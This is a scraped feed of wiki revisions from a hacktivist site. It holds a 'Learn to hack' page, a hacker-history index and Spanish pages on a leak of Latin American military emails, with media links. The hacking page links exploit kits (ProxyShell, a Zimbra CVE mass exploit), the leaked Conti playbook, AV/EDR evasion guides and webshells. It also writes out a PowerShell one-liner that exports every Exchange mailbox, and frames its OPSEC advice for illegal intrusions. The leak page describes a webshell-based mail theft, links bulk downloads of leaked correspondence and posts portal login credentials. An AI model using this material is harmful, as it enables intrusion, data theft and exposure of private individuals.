* https://www.biobiochile.cl/especial/bbcl-investiga/noticias/reportajes/2022/09/22/correos-del-estado-mayor-conjunto-develan-temor-a-otro-catrillanca-y-debilidad-de-inteligencia.shtml<br />
* https://www.t13.cl/noticia/ex-ante/politica/filtracion-correos-militares-informe-efectos-detener-al-vocero-profugo-temucuicui<br />
* https://www.ciperchile.cl/2022/09/22/hackeo-masivo-al-estado-mayor-conjunto-expuso-miles-de-documentos-de-areas-sensibles-de-la-defensa/<br />
* https://www.biobiochile.cl/noticias/nacional/chile/2022/09/22/filtracion-de-correos-general-paiva-presenta-su-renuncia-a-jefatura-de-estado-mayor-conjunto.shtml<br />
* https://resumen.cl/articulos/pdi-investigaba-a-grupo-que-organizaba-recitales-poeticos-y-juntaba-dinero-para-revista-literaria-segun-documentos-filtrados-por-hackers<br />
* https://resumen.cl/articulos/autoridades-electas-del-biobio-eran-espiadas-por-fuerzas-armadas-y-la-ani-segun-revela-filtracion-hacker<br />
* https://interferencia.cl/articulos/hackeo-al-emco-la-colecta-de-la-armada-para-presos-de-punta-peuco-los-youtube-de-johannes<br />
* https://resumen.cl/articulos/hackeo-a-inteligencia-de-ff-aa-y-policias-abunda-informacion-sobre-organizaciones-sociales-pero-casi-no-hay-menciones-al-crimen-organizado<br />
* https://resumen.cl/articulos/actos-y-marchas-feministas-fueron-espiadas-por-la-pdi-en-la-region-de-valparaiso-segun-documentos-hackeados-al-estado-mayor-conjunto<br />
* https://resumen.cl/articulos/archivos-hackeados-revelan-que-organizaciones-sociales-de-osorno-tambien-fueron-investigadas-por-fuerzas-armadas-y-pdi<br />
* https://resumen.cl/articulos/hackeo-a-las-ffaa-informe-concluye-que-fpmr-podia-levantase-en-armas-con-apoyo-internacional-pese-a-que-organizacion-fue-desarticulada-hace-30-anos<br />
* https://resumen.cl/articulos/hackeo-a-las-ffaa-actividad-por-la-nacionalizacion-del-cobre-en-que-participo-daniel-jadue-era-investigada-por-la-pdi<br />
* https://resumen.cl/articulos/editorial-el-hackeo-al-emco-y-la-persistencia-de-una-odiosa-doctrina<br />
* https://www.t13.cl/noticia/ex-ante/nacional/el-manual-guerra-irregular-colombia-general-iturriaga-compartio-emco-27-09-2022<br />
* https://resumen.cl/articulos/mails-hackeados-al-emco-muestran-que-policias-y-ffaa-espiaban-al-colegio-de-profesores-as-desde-antes-del-estallido-social<br />
* https://resumen.cl/articulos/pdi-investigaba-actividades-de-grupos-de-ciclistas-de-concepcion-revelan-documentos-hackeados<br />
* https://www.biobiochile.cl/especial/bbcl-investiga/noticias/reportajes/2022/09/28/hablan-hackers-revelan-que-estado-mayor-conjunto-eligio-no-reparar-falla-que-posibilito-ataque.shtml<br />
* https://www.elclarin.cl/2022/09/27/tras-filtracion-de-correos-de-las-ff-aa-ex-miembros-del-ejercito-y-carabineros-denuncian-seguimiento-a-organizaciones-sociales/<br />
<br />
=== Peru ===<br />
* https://twitter.com/laencerronaperu/status/1578060867580690434#m<br />
<br />
=== El Salvador ===<br />
* https://elfaro.net/es/202210/el_salvador/26418/El-d%C3%ADa-en-que-inici%C3%B3-la-masacre-de-marzo-cuatro-l%C3%ADderes-nacionales-de-la-MS-13-salieron-de-Zacatecoluca.htm<br />
* https://www.elfaro.net/es/202210/el_salvador/26443/PNC-supo-de-la-liberaci%C3%B3n-ilegal-de-Crook-desde-noviembre-de-2021.htm<br />
* https://elfaro.net/es/202304/el_salvador/26800/policia-pidio-investigar-a-militares-del-estado-mayor-por-detencion-ilegal-de-un-joven-en-el-regimen<br />
<br />
=== Colombia ===<br />
* https://www.elespectador.com/judicial/coronel-r-santiago-herrera-el-confeso-autor-de-falsos-positivos-que-ahora-es-consultor-secreto-de-militares/</div>Enlacehacktivistahttps://enlacehacktivista.org/index.php?title=Learn_to_hack&diff=836Learn to hack2023-04-11T22:50:30Z<p>Enlacehacktivista: </p>
<hr />
<div>This page aims to compile high quality resources for hackers. All books listed on this page can be found on [https://libgen.fun/ Library Genesis].<br />
<br />
Make sure that you follow good OPSEC when carrying out your operations! See [https://enlacehacktivista.org/index.php?title=Learn_to_hack#Operational_security OPSEC]<br />
<br />
== General Resources == <br />
<br />
Resources that assume little to no background knowledge:<br />
* https://www.hoppersroppers.org/training.html<br />
* https://tryhackme.com/<br />
<br />
Resources that assume minimal tech background:<br />
* (book) Penetration Testing: A Hands-On Introduction to Hacking<br />
* Bassterlord Networking Manual (translated): https://papers.vx-underground.org/papers/VXUG/Mirrors/BassterlordNetworkingManual.pdf<br />
<br />
Resources that assume a tech or hacking background:<br />
* (book) The Hacker Playbook 3<br />
* books by [https://b-ok.cc/g/Sparc%20Flow Sparc Flow]<br />
* [[Hack Back! A DIY Guide]]<br />
* https://github.com/ForbiddenProgrammer/conti-pentester-guide-leak<br />
** translated: [https://web.archive.org/web/20230404175503if_/https://cdn-150.anonfiles.com/satbX2i8z2/75a3be58-1680631481/Conti_playbook_translated.pdf Conti playbook]<br />
<br />
Practice labs:<br />
* https://www.hackthebox.com<br />
* https://academy.hackthebox.com<br />
* https://www.pentesteracademy.com<br />
* https://lab.pentestit.ru<br />
* https://overthewire.org/wargames<br />
<br />
Appsec:<br />
* https://github.com/paragonie/awesome-appsec<br />
<br />
== General references ==<br />
<br />
General resources you may find useful for learning. see [[General]]<br />
<br />
[https://owasp.org/www-project-top-ten/ OWASP Top 10] is a broad consensus about the most critical security risks to web applications. See TryHackMe's [https://tryhackme.com/room/owasptop10 room] for practical OWASP Top 10 learning and their [https://tryhackme.com/room/owaspjuiceshop Juice Shop].<br />
<br />
=== Red Team Tools for post exploitation (Windows) ===<br />
Find common vulnerabilities and misconfigurations in a windows environment to escalate your privileges: [https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS winPEAS]<br />
<br />
=== Red Team Tools for post exploitation (Linux) ===<br />
Rooting: [[Rooting linux]]<br />
<br />
== Recommended reading - Library ==<br />
See recommended reading [https://libgen.fun books] that will aid you in your learning. See [[recommended reading in the library]]<br />
<br />
== Active Directory ==<br />
<br />
Active Directory General Tools & resources you may find useful for learning. see [[Active Directory]]<br />
<br />
=== Tools ===<br />
* https://mpgn.gitbook.io/crackmapexec/<br />
* https://www.secureauth.com/labs/open-source-tools/impacket/<br />
* https://github.com/dirkjanm/mitm6<br />
* https://github.com/lgandx/Responder<br />
* https://github.com/FuzzySecurity/StandIn<br />
* https://www.joeware.net/freetools/tools/adfind/<br />
* https://github.com/CravateRouge/bloodyAD<br />
* https://github.com/blacklanternsecurity/MANSPIDER<br />
* https://github.com/login-securite/DonPAPI<br />
* Powerview/Sharpview<br />
* Bloodhound/Sharphound<br />
<br />
== Office 365 & Azure ==<br />
* Extremely in-depth technical info on everything https://o365blog.com/<br />
* https://www.synacktiv.com/en/publications/azure-ad-introduction-for-red-teamers.html<br />
* https://blog.xpnsec.com/azuread-connect-for-redteam/<br />
* AAD Connect Cloud Sync: as local admin impersonate or retrieve managed password of the provagentgMSA account to dcsync.<br />
** see: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#reading-gmsa-password<br />
* https://www.blackhillsinfosec.com/webcast-getting-started-in-pentesting-the-cloud-azure/<br />
* https://github.com/dafthack/CloudPentestCheatsheets/blob/master/cheatsheets/Azure.md<br />
* https://www.inversecos.com/<br />
<br />
=== Tools ===<br />
* https://github.com/nyxgeek/o365recon<br />
* https://github.com/dirkjanm/ROADtools<br />
* https://github.com/fox-it/adconnectdump<br />
* https://github.com/LMGsec/o365creeper<br />
* https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html<br />
* https://github.com/rvrsh3ll/TokenTactics<br />
* https://github.com/nyxgeek/onedrive_user_enum<br />
* https://github.com/dafthack/MSOLSpray<br />
* https://github.com/dafthack/MFASweep<br />
<br />
== GSuite ==<br />
https://www.slideshare.net/dafthack/ok-google-how-do-i-red-team-gsuite<br />
<br />
== C2 Frameworks ==<br />
<br />
* https://docs.google.com/spreadsheets/d/1b4mUxa6cDQuTV2BPC6aA-GR4zGZi0ooPYtBe4IgPsSc<br />
<br />
== Antivirus & EDR Evasion ==<br />
<br />
* https://s3cur3th1ssh1t.github.io/Bypass_AMSI_by_manual_modification/<br />
* https://s3cur3th1ssh1t.github.io/Customizing_C2_Frameworks/<br />
* https://s3cur3th1ssh1t.github.io/Powershell-and-the-.NET-AMSI-Interface/<br />
* https://www.blackhillsinfosec.com/tag/sacred-cash-cow-tipping/<br />
* https://blog.securityevaluators.com/creating-av-resistant-malware-part-1-7604b83ea0c0<br />
* https://www.ired.team/offensive-security/defense-evasion<br />
* https://www.youtube.com/watch?v=UO3PjJIiBIE<br />
* https://github.com/matterpreter/DefenderCheck<br />
* https://github.com/RythmStick/AMSITrigger<br />
* https://amsi.fail<br />
<br />
== VMware ==<br />
* Exploiting vCenter to add vSphere user: https://github.com/HynekPetrak/HynekPetrak/blob/master/take_over_vcenter_670.md<br />
* VMware Workspace ONE Access and Identity Manager RCE via SSTI. [https://attackerkb.com/topics/BDXyTqY1ld/cve-2022-22954/rapid7-analysis CVE-2022-22954:] Unauthenticated server-side template injection. [https://github.com/tunelko/CVE-2022-22954-PoC Mass Exploit]<br />
<br />
== RocketChat ==<br />
* Account hijacking and RCE as admin: [https://web.archive.org/web/20210805092939/https://edbrsk.dev/content/real-cases/how-I-compromised-300-stores-and-a-spanish-consultancy https://edbrsk.dev/content/real-cases/how-I-compromised-300-stores-and-a-spanish-consultancy]<br />
<br />
== Microsoft Exchange ==<br />
<br />
ProxyLogon is dead. It's mitigated by Defender. ProxyShell is not. AMSI catches unmodified public exploits.<br />
<br />
* ProxyShell: https://github.com/dmaasland/proxyshell-poc<br />
* Improved proxyshell-poc: https://github.com/horizon3ai/proxyshell<br />
* ProxyShell (webshell via New-MailboxExportRequest): https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/windows/http/exchange_proxyshell_rce.md<br />
* ProxyShell (webshell via New-ExchangeCertificate): https://gist.github.com/dmaasland/0720891aaf6dec8d3b42a5b92c8d6f94<br />
* Polymorphic webshells: https://github.com/grCod/poly<br />
* ProxyShell (no webshell, dump mailboxes via PowerShell): https://github.com/Jumbo-WJB/Exchange_SSRF<br />
* Export all mailboxes: <code>foreach ($mbx in (Get-Mailbox)){New-MailboxExportRequest -mailbox $mbx.alias -FilePath "\\127.0.0.1\C$\Folder\$($mbx.Alias).pst"}</code><br />
* Proxylogon, proxyshell, proxyoracle and proxytoken full chain exploit tool: https://github.com/FDlucifer/Proxy-Attackchain<br />
* Automatic ProxyShell Exploit: https://github.com/Udyz/proxyshell-auto<br />
<br />
== Initial Access ==<br />
<br />
There are many ways to get a foothold into a targets network, from phishing, buying credential access, buying infected machines in corporate networks, password spraying, performing a targeted penetration test and spray and pray scanning for vulnerabilities and hacking in. Here we list some resources in these regards.<br />
<br />
For more information on gaining a foothold, see [[Initial Access Tactics, techniques and procedures]]<br />
<br />
=== Scanning and Recon ===<br />
<br />
For scanning and Recon tools. see [[Scanning and Recon]]<br />
<br />
=== Search Engines ===<br />
<br />
Search engines are a useful tool for gathering information and intelligence from publicly available sources. Some are paid and some are not. Make sure to operate good OPSEC whenever placing a purchase for any service that will be used in your recon on a target.<br />
<br />
For more information on recommended search engines, see [[Search Engines Resources]]<br />
<br />
=== OSINT ===<br />
<br />
Open-source intelligence (OSINT) refers to the collection and analysis of information from publicly available sources.<br />
<br />
For more information on recommended tools and resources, see [[OSINT Tools and Resources]]<br />
<br />
== API Hacking ==<br />
* https://github.com/arainho/awesome-api-security<br />
* [https://owasp.org/www-project-api-security/ OWASP API Security]<br />
<br />
=== practice ===<br />
* https://github.com/Checkmarx/capital<br />
<br />
== IoT Hacking ==<br />
* https://github.com/V33RU/IoTSecurity101<br />
<br />
== Intercepting Proxies ==<br />
These let you view, edit, and replay requests, and are extremely useful for finding vulnerabilities in web applications.<br />
* https://portswigger.net/burp<br />
* https://www.zaproxy.org/<br />
* https://mitmproxy.org/<br />
<br />
== Operational security ==<br />
<br />
Operational security (Opsec) is crucial for protecting oneself from surveillance and maintaining anonymity while conducting hacktivist activities.<br />
<br />
=== Recommended Measures ===<br />
<br />
Any illegal hacktivity should be done from an encrypted and separate computer or virtual machine, with all traffic over Tor.<br />
<br />
For more information on recommended measures, see [[Opsec Measures]]<br />
<br />
== Secure Messaging ==<br />
<br />
Best practice for secure messaging includes using connections over Tor and end-to-end encryption for messages.<br />
<br />
=== Recommended Applications ===<br />
<br />
For Jabber/XMPP, make sure to enable OTR or OMEMO encryption. For email use PGP for encryption. For file sharing use onionshare.<br />
<br />
For more information on recommended applications, see [[Secure Messaging Applications]]</div>Enlacehacktivistahttps://enlacehacktivista.org/index.php?title=Hacker_History&diff=717Hacker History2023-03-23T18:40:34Z<p>Enlacehacktivista: /* 2019 */</p>
<hr />
<div>==2008==<br />
* [[Sarah Palin emails]]<br />
<br />
== 2010 ==<br />
* [[SRS Electronic Declaration System]]<br />
* [[Operation Payback]]<br />
<br />
== 2011 ==<br />
* [[Chinga la Migra]]<br />
* [[CorruptBrazil]]<br />
* [[Fuck FBI Friday]]<br />
* [[HBGary]]<br />
* [[LeakyMails]]<br />
* [[Shooting Sheriffs Saturday]]<br />
* [[Sownage]]<br />
* [[Stratfor]]<br />
<br />
== 2012 ==<br />
* [[Apple UDIDs]]<br />
* [[CSLEA]]<br />
* [[Norton AntiVirus]]<br />
* [[Syria emails]]<br />
* [[Bureau Of Justice]]<br />
<br />
== 2013 ==<br />
* [[Project AIG]]<br />
<br />
== 2014 ==<br />
* [[LulzSecPeru]]<br />
* [[Gamma Group]]<br />
* [[Russian Interior Ministry]]<br />
<br />
== 2015 ==<br />
* [[wikipedia:Football Leaks]]<br />
* [[Hacking Team]]<br />
<br />
== 2016 ==<br />
* [[Berat Albayrak Emails]]<br />
* [[Panama Papers]]<br />
* [[Surkov Leaks]]<br />
* [[Catalan police union]]<br />
<br />
== 2017 ==<br />
* [[Bob Otto emails]]<br />
* [[Cellebrite]]<br />
* [[Flexispy]]<br />
* [[Freedom Hosting II]]<br />
<br />
== 2018 ==<br />
* [[Salvini emails]]<br />
* [[Doxxing-Adventskalender]]<br />
<br />
== 2019 ==<br />
* [[GorraLeaks]]<br />
* [[Paco Leaks]]<br />
* [[Milico Leaks]]<br />
* [[Capital One]]<br />
* [[GdP (Hambacher Forest)]]<br />
* [[Perceptics]]<br />
* [[Cayman National Bank and Trust (Isle of Man)]]<br />
* [[Iron March]]<br />
* [[Varela Leaks]]<br />
<br />
== 2020 ==<br />
* [[Luanda Leaks]]<br />
* [[BlueLeaks]]<br />
* [[Intel exconfidential Lake]]<br />
<br />
== 2021 ==<br />
* [[Gab]]<br />
* [[Myanmar Investments]]<br />
* [[American Patriots Three Percent]]<br />
* [[Verkada]]<br />
* [[Sons of Confederate Veterans]]<br />
* [[MagaCoin]]<br />
* [[Electronic Arts]]<br />
* [[Tea Party Patriots]]<br />
* [[Cyber Partisans]]<br />
* [[HART]]<br />
* [[Policía Nacional Civil de El Salvador]]<br />
* [[Epik]]<br />
* [[Oath Keepers]]<br />
* [[America's Frontline Doctors]]<br />
* [[Twitch]]<br />
* [[Attila Hildmann]]<br />
* [[Metropolitan Police Department D.C.]]<br />
* [[Academy of Public Administration (Belarus)]]<br />
* [[AnibalLeaks]]<br />
<br />
== 2022 ==<br />
* [[Myanmar Internal Revenue Department]]<br />
* [[Patriot Front]]<br />
* [[Belarusian Railway]]<br />
* [[Pronico]]<br />
* [[Roskomnadzor]]<br />
* [[OpRussia]]<br />
* [[Nauru Police Force]]<br />
* [[Extractivist Leaks/es]]<br />
* [[Uber]]<br />
* [[Liberty Counsel]]<br />
* [[Fiscalia|Fiscalia of Colombia]]<br />
* [[Fuerzas Represivas]]<br />
<br />
== 2023 ==<br />
* [[Odin Intelligence]]</div>Enlacehacktivistahttps://enlacehacktivista.org/index.php?title=GdP_(Hambacher_Forest)&diff=716GdP (Hambacher Forest)2023-03-23T18:40:11Z<p>Enlacehacktivista: Created page with "The website of the GdP (german police union) was hacked and defaced with a message in solidarity with the defenders of Hambacher forest. https://hambacherforst.org/blog/2019/12/03/13669/"</p>
<hr />
<div>The website of the GdP (german police union) was hacked and defaced with a message in solidarity with the defenders of Hambacher forest.<br />
<br />
https://hambacherforst.org/blog/2019/12/03/13669/</div>Enlacehacktivistahttps://enlacehacktivista.org/index.php?title=Fuerzas_Represivas&diff=715Fuerzas Represivas2023-03-22T22:32:59Z<p>Enlacehacktivista: /* Cobertura mediática */</p>
<hr />
<div>Nos llega 10 TB de correos filtrados por el grupo [[Guacamaya]], esta vez de organismos militares y policiales de varios paises. Publican un [https://enlacehacktivista.org/comunicado_guacamaya4.txt comunicado] y [https://enlacehacktivista.org/poema_guacamaya.txt poema] explicando sus motivos y un [https://enlacehacktivista.org/hackback2.webm video] que muestra como se descargaron los correos de esta filtración y de las [https://enlacehacktivista.org/index.php?title=Fiscalia/en dos] [https://enlacehacktivista.org/index.php?title=Extractivist_Leaks/es anteriores.]<br />
<br />
Cabe mencionar que el grupo Guacamaya nunca tendrá cuentas en redes sociales. [https://twitter.com/guacamayahacks Esta cuenta] es [https://www.milenio.com/opinion/viri-rios/no-es-normal/el-engano-de-la-cuenta-falsa-de-guacamaya falsa.]<br />
<br />
Aparte del EMCO no hemos tenido tiempo aún revisar si contienen información personal sensible o peligrosa así que de momento están solo disponibles para periodistas y otros investigadores. Para acceso a los correos, contacta con [mailto:press@ddosecrets.com DDoSecrets]<br />
<br />
== El Estado Mayor Conjunto de las Fuerza Armadas de Chile ==<br />
<br />
Se puede descargar sus correos de: https://files.enlacehacktivista.org/emco.mil.cl/<br />
<br><br />
O como torrent de: https://files.enlacehacktivista.org/emco.mil.cl.torrent<br />
<br><br />
Hay dos archivos .zip para cada empleado, nombre.zip - que contiene los correos de su bandeja de entrada, y nombre_sent.zip - que contiene los correos de su carpeta de enviados. Dentro de cada zip estan los correos en formato .eml. Se puede usar un cliente de correo como Thunderbird con la extensión ImportExportTools NG (https://addons.thunderbird.net/en-US/thunderbird/addon/importexporttools-ng/) para importar todo los .eml<br />
<br />
También tenemos un buscador basico donde se puede ver los correos en linea: https://piler.enlacehacktivista.org/<br />
<br><br />
Con el usuario: auditor@emco.mil.cl<br />
<br><br />
y la contraseña: hunter2<br />
<br><br />
Puede que no encuentre todos los correos, si se va a hacer una investigación seria es mejor descargar todo y buscar en su computadora.<br />
<br />
Puede ser de interes para quienes investigan la militarización y ocupación del territorio Mapuche buscar por ejemplo: SITREP Araucanía<br />
<br><br />
SITREP son informes diarios de actividades militares. También puede ser de interes los correos de depani@investigaciones.cl y los informes de JENAINPOL<br />
<br />
== Secretaría de la Defensa Nacional de México (6 TB) ==<br />
<br />
Terminan sus fichas sobre líderes sociales con: <br />
<blockquote><br />
Hasta el momento no se tiene conocimiento que mantenga vínculos con integrantes de organizaciones delictivas.<br />
</blockquote><br />
SEDENA no puede decir lo mismo sobre si misma.<br />
<br><br />
No hemos tenido tiempo de investigar mucho, pero [https://enlacehacktivista.org/sedena acá] hemos subido algunos documentos que pueden ser de interés público, dónde se ve que clase de actividades la SEDENA está investigando como "amenazas a la seguridad nacional" en vez de investigar al crimen organizado y otras amenazas reales.<br />
<br />
=== Explicación del Hackeo ===<br />
Según las hackers:<br />
<blockquote><br />
Todas las demás filtraciones fueron descargadas con Proxyshell como se ve en [https://enlacehacktivista.org/hackback2.webm el video,] pero SEDENA fue con una vulnerabilidad antigua de Zimbra. Fue simplemente usar [https://github.com/Josexv1/CVE-2022-27925 esto] para explotar la vulnerabilidad y subir una webshell, y luego usar la webshell para descargar todos los correos de /opt/zimbra/store. Ya había muchas otras webshells allí, con fecha desde el 5 de Julio (la fecha puede ser facilmente cambiado con touch -t pero también esta documentado que en Julio se empezó a explotar muchos servidores de Zimbra) y vimos que otros hackers también estuvieron descargando los correos a la vez.<br />
</blockquote><br />
<br />
=== Cobertura mediática ===<br />
* https://ddosecrets.com/wiki/Secretar%C3%ADa_de_la_Defensa_Nacional_de_M%C3%A9xico#Research<br />
* https://latinus.us/2022/09/29/loret-capitulo-96/<br />
Sobre porque se publicó primero en Latinus, la guacamaya respondió:<br />
<blockquote><br />
Unos cuantos periodistas ya tenían la filtración, lo que pasa es que hacer una investigación de calidad se demora meses, Loret solo tardó unos días en encontrar algunos informes médicos de AMLO. Nos gustaría que todas tuvieran acceso a la filtración, pero en este caso no es posible, ya que hay información que en manos de narcos podría poner en riesgo a mucha gente. Sin embargo se compartió con varios periodistas de investigación, que escribieron a DDoSecrets o Enlace Hacktivista, nos guste su política y sus reportajes o no.<br />
</blockquote><br />
* https://elpais.com/mexico/2022-10-02/tengo-miedo-de-que-me-hagan-dano-los-correos-del-ejercito-mexicano-desvelan-decenas-de-abusos-sexuales-en-la-institucion.html<br />
* https://www.animalpolitico.com/2022/10/sedena-software-espia-periodistas-defensores-derechos-humanos/<br />
* https://aristeguinoticias.com/0310/mexico/sedena-nego-y-oculto-contratos-de-espionaje-pero-hackeo-evidencio-que-si-existen-periodista/<br />
* https://elpais.com/mexico/2022-10-04/el-ejercito-mexicano-investigo-a-diputados-senadores-y-gobernadores.html<br />
* https://www.sinembargo.mx/03-10-2022/4263091<br />
* https://la-lista.com/derechos-humanos/2022/10/10/guacamayaleaks-los-planes-secretos-del-ejercito-para-cerrar-el-caso-ayotzinapa<br />
* https://contralacorrupcion.mx/la-secreta-operacion-limpieza-del-ejercito-en-el-caso-ayotzinapa/<br />
* https://www.proceso.com.mx/nacional/2022/10/5/sedena-leaks-el-ejercito-autor-de-la-reforma-para-controlar-la-guardia-nacional-294665.html<br />
* https://causanatura.org/periodismo-cn/con-pena-nieto-y-amlo-sedena-monitoreo-a-opositores-al-fracking-en-la-huasteca-de-san-luis-potosi<br />
* https://twitter.com/isagvh/status/1577875084278112259<br />
* https://www.youtube.com/watch?v=OyNpRrhgHJQ<br />
* https://undergroundperiodismo.com/entrega-sre-a-la-sedena-reportes-internos-sobre-simpatizantes-del-ezln-en-europa/<br />
* https://laotraopinion.com.mx/guacamaya-leaks-las-fiestas-privadas-de-la-sedena-con-abusos-sexuales/<br />
* https://lahojadelpueblo2022.blogspot.com/2022/10/el-ejercito-le-seguia-los-pasos-al.html<br />
* https://www.proceso.com.mx/nacional/2022/11/6/cndh-estalla-por-reportaje-de-proceso-que-revela-ordenes-de-la-sedena-sobre-caso-ayotzinapa-296486.html<br />
* https://lasillarota.com/nacion/2022/11/11/guacamaya-leaks-sedena-pidio-zaldivar-suavizar-jueces-por-delitos-de-militares-401304.html<br />
* https://ejercitoespia.r3d.mx/<br />
* https://aristeguinoticias.com/1303/mexico/guacamaya-leaks-documentan-seguimiento-militar-a-normalistas/<br />
<br />
== Otros ==<br />
<br />
* Policía Nacional Civil de El Salvador (4 TB, @pnc.gob.sv)<br />
* Comando General de las Fuerzas Militares de Colombia (275 GB, @cgfm.mil.co)<br />
* Fuerza Armada de El Salvador (50 GB, @faes.gob.sv)<br />
* Comando Conjunto de las Fuerzas Armadas de Peru (35 GB, @ccffaa.mil.pe)<br />
* Ejercito del Peru (70 GB, @ejercito.mil.pe)<br />
<br />
== Arte ==<br />
<br />
Ilustraciones del [https://enlacehacktivista.org/hackback2.webm video] que muestra el hackeo. La banda sonora del video se puede encontrar [https://enlacehacktivista.org/guacamaya_soundtrack2.txt aquí.]<br />
<br />
[[File:Resistencia milenaria2.png|400px|border|una guacamaya descargando correos]]<br />
[[File:Fin_de_la_milicia.png|400px|border|Fin de la milicia]]<br />
<br />
== Cobertura mediática ==<br />
<br />
=== Chile ===<br />
* https://resumen.cl/articulos/hackeo-armada-espio-vecinos-recolectaban-leche-ninos-pandemia<br />
* https://resumen.cl/articulos/grupos-ambientales-del-biobio-en-la-mira-del-ejercito-organizaciones-contra-la-central-rucalhue-y-coordinadora-chorera-forman-parte-de-documentos-hackeados-a-las-fuerzas-armadas<br />
* https://resumen.cl/articulos/hackeo-a-correos-del-ejercito-revelo-que-espiaban-a-las-juventudes-comunistas-a-traves-de-redes-sociales<br />
* https://resumen.cl/articulos/hackeo-filtra-que-armada-ha-gastado-mas-de-690-millones-en-estados-de-excepcion-en-el-biobio-148-millones-solo-en-viaticos-viaticos-y-gratificaciones<br />
* https://interferencia.cl/articulos/mails-hackeados-informes-del-emco-recomendaron-familias-castrenses-estar-abastecidas-al<br />
* https://www.biobiochile.cl/especial/bbcl-investiga/noticias/reportajes/2022/09/22/correos-del-estado-mayor-conjunto-develan-temor-a-otro-catrillanca-y-debilidad-de-inteligencia.shtml<br />
* https://www.t13.cl/noticia/ex-ante/politica/filtracion-correos-militares-informe-efectos-detener-al-vocero-profugo-temucuicui<br />
* https://www.ciperchile.cl/2022/09/22/hackeo-masivo-al-estado-mayor-conjunto-expuso-miles-de-documentos-de-areas-sensibles-de-la-defensa/<br />
* https://www.biobiochile.cl/noticias/nacional/chile/2022/09/22/filtracion-de-correos-general-paiva-presenta-su-renuncia-a-jefatura-de-estado-mayor-conjunto.shtml<br />
* https://resumen.cl/articulos/pdi-investigaba-a-grupo-que-organizaba-recitales-poeticos-y-juntaba-dinero-para-revista-literaria-segun-documentos-filtrados-por-hackers<br />
* https://resumen.cl/articulos/autoridades-electas-del-biobio-eran-espiadas-por-fuerzas-armadas-y-la-ani-segun-revela-filtracion-hacker<br />
* https://interferencia.cl/articulos/hackeo-al-emco-la-colecta-de-la-armada-para-presos-de-punta-peuco-los-youtube-de-johannes<br />
* https://resumen.cl/articulos/hackeo-a-inteligencia-de-ff-aa-y-policias-abunda-informacion-sobre-organizaciones-sociales-pero-casi-no-hay-menciones-al-crimen-organizado<br />
* https://resumen.cl/articulos/actos-y-marchas-feministas-fueron-espiadas-por-la-pdi-en-la-region-de-valparaiso-segun-documentos-hackeados-al-estado-mayor-conjunto<br />
* https://resumen.cl/articulos/archivos-hackeados-revelan-que-organizaciones-sociales-de-osorno-tambien-fueron-investigadas-por-fuerzas-armadas-y-pdi<br />
* https://resumen.cl/articulos/hackeo-a-las-ffaa-informe-concluye-que-fpmr-podia-levantase-en-armas-con-apoyo-internacional-pese-a-que-organizacion-fue-desarticulada-hace-30-anos<br />
* https://resumen.cl/articulos/hackeo-a-las-ffaa-actividad-por-la-nacionalizacion-del-cobre-en-que-participo-daniel-jadue-era-investigada-por-la-pdi<br />
* https://resumen.cl/articulos/editorial-el-hackeo-al-emco-y-la-persistencia-de-una-odiosa-doctrina<br />
* https://www.t13.cl/noticia/ex-ante/nacional/el-manual-guerra-irregular-colombia-general-iturriaga-compartio-emco-27-09-2022<br />
* https://resumen.cl/articulos/mails-hackeados-al-emco-muestran-que-policias-y-ffaa-espiaban-al-colegio-de-profesores-as-desde-antes-del-estallido-social<br />
* https://resumen.cl/articulos/pdi-investigaba-actividades-de-grupos-de-ciclistas-de-concepcion-revelan-documentos-hackeados<br />
* https://www.biobiochile.cl/especial/bbcl-investiga/noticias/reportajes/2022/09/28/hablan-hackers-revelan-que-estado-mayor-conjunto-eligio-no-reparar-falla-que-posibilito-ataque.shtml<br />
* https://www.elclarin.cl/2022/09/27/tras-filtracion-de-correos-de-las-ff-aa-ex-miembros-del-ejercito-y-carabineros-denuncian-seguimiento-a-organizaciones-sociales/<br />
<br />
=== Peru ===<br />
* https://twitter.com/laencerronaperu/status/1578060867580690434#m<br />
<br />
=== El Salvador ===<br />
* https://elfaro.net/es/202210/el_salvador/26418/El-d%C3%ADa-en-que-inici%C3%B3-la-masacre-de-marzo-cuatro-l%C3%ADderes-nacionales-de-la-MS-13-salieron-de-Zacatecoluca.htm<br />
* https://www.elfaro.net/es/202210/el_salvador/26443/PNC-supo-de-la-liberaci%C3%B3n-ilegal-de-Crook-desde-noviembre-de-2021.htm<br />
<br />
=== Colombia ===<br />
* https://www.elespectador.com/judicial/coronel-r-santiago-herrera-el-confeso-autor-de-falsos-positivos-que-ahora-es-consultor-secreto-de-militares/</div>Enlacehacktivistahttps://enlacehacktivista.org/index.php?title=Fuerzas_Represivas&diff=714Fuerzas Represivas2023-03-10T22:57:56Z<p>Enlacehacktivista: /* Cobertura mediática */</p>
<hr />
<div>Nos llega 10 TB de correos filtrados por el grupo [[Guacamaya]], esta vez de organismos militares y policiales de varios paises. Publican un [https://enlacehacktivista.org/comunicado_guacamaya4.txt comunicado] y [https://enlacehacktivista.org/poema_guacamaya.txt poema] explicando sus motivos y un [https://enlacehacktivista.org/hackback2.webm video] que muestra como se descargaron los correos de esta filtración y de las [https://enlacehacktivista.org/index.php?title=Fiscalia/en dos] [https://enlacehacktivista.org/index.php?title=Extractivist_Leaks/es anteriores.]<br />
<br />
Cabe mencionar que el grupo Guacamaya nunca tendrá cuentas en redes sociales. [https://twitter.com/guacamayahacks Esta cuenta] es [https://www.milenio.com/opinion/viri-rios/no-es-normal/el-engano-de-la-cuenta-falsa-de-guacamaya falsa.]<br />
<br />
Aparte del EMCO no hemos tenido tiempo aún revisar si contienen información personal sensible o peligrosa así que de momento están solo disponibles para periodistas y otros investigadores. Para acceso a los correos, contacta con [mailto:press@ddosecrets.com DDoSecrets]<br />
<br />
== El Estado Mayor Conjunto de las Fuerza Armadas de Chile ==<br />
<br />
Se puede descargar sus correos de: https://files.enlacehacktivista.org/emco.mil.cl/<br />
<br><br />
O como torrent de: https://files.enlacehacktivista.org/emco.mil.cl.torrent<br />
<br><br />
Hay dos archivos .zip para cada empleado, nombre.zip - que contiene los correos de su bandeja de entrada, y nombre_sent.zip - que contiene los correos de su carpeta de enviados. Dentro de cada zip estan los correos en formato .eml. Se puede usar un cliente de correo como Thunderbird con la extensión ImportExportTools NG (https://addons.thunderbird.net/en-US/thunderbird/addon/importexporttools-ng/) para importar todo los .eml<br />
<br />
